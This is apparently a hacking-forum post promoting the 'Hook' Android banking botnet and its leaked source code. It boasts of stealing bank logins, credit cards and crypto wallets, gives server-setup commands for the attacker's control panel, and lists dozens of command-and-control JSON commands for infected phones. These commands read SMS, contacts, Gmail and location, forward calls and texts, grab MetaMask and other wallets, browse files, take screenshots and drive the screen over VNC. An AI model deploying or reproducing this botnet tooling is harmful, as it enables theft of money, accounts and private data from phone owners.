
Hook is an Android banking botnet with a lot of features. It has almost 300+ features making it one of the most dangerous Android hacking botnets of the time. just like anubis android botnet it contains vnc feature that help attacker to use and control victim device screens.
It can auto detect bank applications and give you full control via panel
it can also detect stored credit cards and send them to you
Best feature it also support crypto application for infection. So now you can also gain access to victims crypto.
There are also a lot of features that i will update soon..
Edit : Better Explained Full Detailed Txt Tutorial
To view this hidden content, you need to get a premium subscription. Click here to purchase.
Get a vps
Code:
mkdir /var/www
Code:
cd /var/www
Code:
sudo apt update
Code:
sudo apt-get install build-essential -y
Code:
sudo apt-get install unzip
Code:
unzip {archive_name}.zip
maybe you have to go to backend for next command
No need to use cp .env.example .env command we added it in install docker file
Code:
make install && make ports && make env && make build
Code:
docker-compose exec mysql bash mysql -u root -p hook < hook.sql
Code:
{
"command": "getcallhistory",
"payload": {}
}
{
"command": "getcontacts",
"payload": {}
}
{
"command": "addcontact",
"payload": {
"arg1": "+79699996565",
"arg2": "Имя"
}
}
{
"command": "getlocation",
"payload": {}
}
{
"command": "getimages",
"payload": {}
}
{
"command": "openapp",
"payload": {
"arg1": "com.google.android.gm"
}
}
{
"command": "openwhatsapp",
"payload": {
"arg1": "+79891000000",
"arg2": "+text"
}
}
{
"command": "makecall",
"payload": {
"arg1": "+79891000000"
}
}
{
"command": "forwardsms",
"payload": {
"number": "+79891000000"
}
}
{
"command": "sendsms",
"payload": {
"sim": "",
"text": "test text",
"number": "+79891000000"
}
}
{
"command": "startussd",
"payload": {
"sim": "",
"ussd": "*100#"
}
}
{
"command": "forwardcall",
"payload": {
"sim": "",
"number": "+79891000000"
}
}
{
"command": "push",
"payload": {
"app": "com.google.android.gm",
"text": "test text",
"title": "+79891000000"
}
}
{
"command": "getaccounts",
"payload": {}
}
{
"command": "getinstallapps",
"payload": {}
}
{
"command": "getsms",
"payload": {}
}
{
"command": "startinject",
"payload": {
"app": "com.google.android.gm"
}
}
{
"command": "updateinjectandlistapps",
"payload": {}
}
{
"command": "openurl",
"payload": {
"url": "yandex.ru"
}
}
{
"command": "sendsmsall",
"payload": {
"sim": "",
"text": "+79891000000"
}
}
{
"command": "startapp",
"payload": {
"app": "com.google.android.gm"
}
}
{
"command": "calling",
"payload": {
"lock": "",
"number": "+79891000000"
}
}
{
"command": "deleteapplication",
"payload": {
"app": "com.vkontakte.android"
}
}
{
"command": "gmailtitles",
"payload": {}
}
{
"command": "getgmailmessage",
"payload": {
"mes_num": "0"
}
}
{
"command": "startadmin",
"payload": {}
}
{
"command": "takescreenshot",
"payload": {}
}
{
"command": "clearcache",
"payload": {
"app": "com.google.android.gm"
}
}
{
"command": "startauthenticator2",
"payload": {}
}
{
"command": "trust",
"payload": {}
}
{
"command": "mycelium",
"payload": {}
}
{
"command": "piuk",
"payload": {}
}
{
"command": "samourai",
"payload": {}
}
{
"command": "bitcoincom",
"payload": {}
}
{
"command": "toshi",
"payload": {}
}
{
"command": "metamask",
"payload": {}
}
{
"command": "killme",
"payload": {}
}
FILEMANAGER
{
"command": "fmmanager",
"payload": {
"path": "/storage/emulated/0/",
"extra": "ls"
}
}
{
"command": "downloadimage",
"payload": {
"arg1": "/storage/emulated/0/DCIM/Camera/IMG20220214183905.jpg"
}
}
VNC
{
"command": "start_vnc",
"payload": {}
}
{
"command": "stop_vnc",
"payload": {}
}
{
"command": "clickattext",
"payload": {
"text": "Яндекс"
}
}
{
"command": "clickatcontaintext",
"payload": {
"text": "ЗАКРЫТЬ"
}
}
{
"command": "clickat",
"payload": {
"id": "addRecordsButton"
}
}
{
"command": "scrolldown_",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "scrolldown",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "scrollup_",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "scrollup",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "swipeleft",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "swiperight",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "swipeup",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "swipedown",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "swipe",
"payload": {
"x": "100",
"y": "100",
"x1": "500",
"y1": "500"
}
}
{
"command": "tap",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "longpress",
"payload": {
"x": "100",
"y": "100"
}
}
{
"command": "cuttext",
"payload": {
"text": "text"
}
}
{
"command": "onkeyevent",
"payload": {
"key": "recents" // recents,back,home
}
}
Currently, you can download the hook botnet leaked source code:
To view this hidden content, you need to get a premium subscription. Click here to purchase.
Last edited: